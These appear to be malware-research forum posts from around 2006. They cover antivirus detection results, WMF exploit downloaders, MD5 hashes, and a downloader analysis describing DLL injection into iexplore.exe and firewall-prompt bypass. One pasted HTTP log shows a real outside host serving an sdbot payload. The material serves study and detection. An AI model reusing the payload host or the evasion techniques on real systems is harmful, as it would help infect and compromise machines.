For love of the old school and keeping it real I've run some older malware through some modern AV/MW detection software. Interesting results:
Found Email-Flooder.Win32.Weirder (probable variant)
Norman Virus Control
Hey all, ive been pretty busy with the new baby, however I do have a request.
Anyone have a copy of the WMF contruction kit?
Just another downloader, fully reversed into C code. I've picked it up a few days ago and sent to AVs, so most of them have signatures by now:
AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Klone
BitDefender Found GenPack:Trojan.Downloader.Galapoper.A
ClamAV Found nothing
Dr.Web Found Trojan.Galapoper
F-Prot Antivirus Found nothing
Fortinet Found W32/KlonePacked.B-tr
Kaspersky Anti-Virus Found Packed.Win32.Klone.b
NOD32 Found probably a variant of Win32/TrojanDownloader.Small.AVT (probable variant)
I have some wmf exploit files.
Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Heres some pretty pictures:
So sdbot05b.jpg gets turned into command.pif GET /sdbot05b.jpg HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: charmedmadgic.free.fr Connection: Keep-Alive HTTP/1.1 200 OK Date: Mon, 02 Jan 2006 05:24:45 GMT
We had a healthy baby boy born this morning at 6:57am so I'll probably not be posting much for a little while.
Have a happy new year!!
A couple of things:
To all my military / government visitors. I notice people visiting but not logging in. If you would like an account but don't want to go through the normal sign up process, or don't have a public email you can use, feel free to let me know and I'd be happy to set you up an account.
A general thing, the file upload is broken. I am working on fixing it but no luck so far. Basically when you go to upload a file and hit add you will see a bunch of errors. However if you scroll down and hit submit, it still uploads successfully regardless of the errors. People can also just email me and I will post for them / give credit. Zip everything and password proect it with "offensivecomputing" so it will send.
These files compose downloader from the original WMF exploit posted on bugtraq. It is composed of two parts:
bumXXX.exe md5sum: FE3B1E317846E0F398AF27954DD09C93
tioXXX.dll md5sum: 2AE5ED3EDD6925D6117548CF1E9F3C52
tioXXX.dll is dropped by bumXXX.exe and used for DLL injection into spawned iexplore.exe for downloading additional components. It also tries to bypass firewalls by sending WM_LBUTTONDOWN/WM_LBUTTONUP messages to firewall confirmation dialog.
Also bumXXX.exe is packed with PE Compact, i just ran it and dumped it's memory image, and fixed IAT manually, the only PE Compact unpacker I found didn't work :/
Sometime today we crossed the 100k hits mark!
Not bad for a couple of weeks time with only really 3 days being truly public.
Welcome to all the visitors.
Now about about contributing some analysis, signatures, etc. :)